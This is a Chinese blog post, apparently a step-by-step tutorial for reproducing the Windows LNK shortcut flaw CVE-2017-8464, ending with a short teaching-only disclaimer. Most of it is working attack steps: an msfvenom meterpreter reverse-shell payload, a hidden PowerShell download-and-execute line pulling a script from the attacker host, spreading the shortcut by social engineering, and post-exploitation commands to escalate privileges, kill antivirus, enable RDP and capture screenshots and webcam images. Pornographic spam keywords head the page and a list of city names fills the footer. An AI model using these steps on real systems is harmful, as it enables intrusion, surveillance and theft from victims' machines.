最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

什么是 CVE-2017-8464 怎么復現(xiàn)

2022-02-15 16:58 作者:天涯客追隨  | 我要投稿

說明:

2017年6月13日,微軟官方發(fā)布編號為CVE-2017-8464的漏洞公告,官方介紹Windows系統(tǒng)在解析快捷方式時存在遠程執(zhí)行任意代碼的高危漏洞,黑客可以通過U盤、網(wǎng)絡共享等途徑觸發(fā)漏洞,完全控制用戶系統(tǒng),安全風險高危

傳播的載體一般是LNK ,LNK是windows系統(tǒng)內(nèi)應用程序快捷方式文件的文件類型后綴名。

危害:

被攻擊機插入存在攻擊lnk的U盤后會反彈shell,哪怕是被隔離的內(nèi)網(wǎng),也可以在不上網(wǎng)的情況下被攻擊。

二、環(huán)境準備:

1 可復現(xiàn)的操作系統(tǒng)版本:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems

  • Microsoft Windows 10 Version 1607 for x64-based Systems

  • Microsoft Windows 10 for 32-bit Systems

  • Microsoft Windows 10 for x64-based Systems

  • Microsoft Windows 10 version 1511 for 32-bit Systems

  • Microsoft Windows 10 version 1511 for x64-based Systems

  • Microsoft Windows 10 version 1703 for 32-bit Systems

  • Microsoft Windows 10 version 1703 for x64-based Systems

  • Microsoft Windows 7 for 32-bit Systems SP1

  • Microsoft Windows 7 for x64-based Systems SP1

  • Microsoft Windows 8.1 for 32-bit Systems

  • Microsoft Windows 8.1 for x64-based Systems

  • Microsoft Windows RT 8.1

2 可復現(xiàn)的服務器系統(tǒng)版本:

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1

  • Microsoft Windows Server 2008 for 32-bit Systems SP2

  • Microsoft Windows Server 2008 for Itanium-based Systems SP2

  • Microsoft Windows Server 2008 for x64-based Systems SP2

  • Microsoft Windows Server 2012

  • Microsoft Windows Server 2012 R2

  • Microsoft Windows Server 2016

3 kali操作系統(tǒng)

三、利用原理

創(chuàng)建惡意快捷方式,包含惡意執(zhí)行腳本,點擊惡意快捷方式,導致本機中病毒,并且被遠控。

四、實戰(zhàn)利用

啟動MSF

終端內(nèi)輸入:msfconsole

開始利用:

1、使用MSF創(chuàng)建一個后門

msf內(nèi)輸入:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.23 lport=4456 -f psh-reflection>/var/www/html/link.ps1

2、在kali下開啟apache2

終端內(nèi)輸入:service apache2 start

3、通過社會學進行快捷方式傳播

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.204.135/link.ps1');test.ps1"


4 回到MSF終端配置監(jiān)聽

msf內(nèi)輸入: ?use exploit/multi/handler

5 配置payload

set payload windows/x64/meterpreter/reverse_tcp


msf中輸入 : show options ? 配置payload


設置 LHOST ?和 ?LPORT

maf中輸入:

5.1 ?set lhost <當前機器ip> 設置 LHOST

5.2 ?set lport ?<未被占用的端口> ?設置 LPORT


5.3 ?最后在 輸入 show options 查看配置是否生效


6、執(zhí)行監(jiān)聽

msf中輸入 : run 或者 ?exploit


進入靶機執(zhí)行我們在靶機上創(chuàng)建的快捷方式


稍等片刻獲取到meterpreter


五、后滲透

1、通過快捷方式執(zhí)行程序

meterpreter中輸入 ?shell


發(fā)現(xiàn)shell顯示有亂碼

shell內(nèi)輸入 ?chcp 65001


然后進入desktop目錄(這個是win的桌面)

根據(jù)實際情況拼路徑

shell 里輸入:cd users/mb/desktop


2 更多操作

查看進程:ps查看當前進程號:getpid查看系統(tǒng)信息:sysinfo查看目標機是否為虛擬機:run post/windows/gather/checkvm查看完整網(wǎng)絡設置:route查看當前權限:getuid自動提權:getsystem關閉殺毒軟件:run post/windows/manage/killav啟動遠程桌面協(xié)議:run post/windows/manage/enable_rdp列舉當前登錄的用戶:run post/windows/gather/enum_logged_on_users查看當前應用程序:run post/windows/gather/enum_applications抓取目標機的屏幕截圖:load espia ; screengrab抓取攝像頭的照片:webcam_snap查看當前處于目標機的那個目錄:pwd查看當前目錄:getlwd



注意所有操作均在實驗環(huán)境下進行,僅用于教學展示,請勿用于其他渠道 出現(xiàn)任何問題與本up無關!

什么是 CVE-2017-8464 怎么復現(xiàn)的評論 (共 條)

分享到微博請遵守國家法律
双流县| 胶州市| 米泉市| 偃师市| 禹城市| 通化市| 婺源县| 阿拉善左旗| 榆林市| 海南省| 龙游县| 环江| 盐源县| 莱西市| 六枝特区| 兴山县| 海城市| 绥中县| 沈阳市| 昌图县| 囊谦县| 宁武县| 博野县| 通渭县| 石狮市| 安仁县| 台北市| 开化县| 兴仁县| 凤城市| 宁城县| 壶关县| 原平市| 白银市| 桂东县| 荆门市| 宾川县| 务川| 铁岭市| 抚宁县| 衡阳县|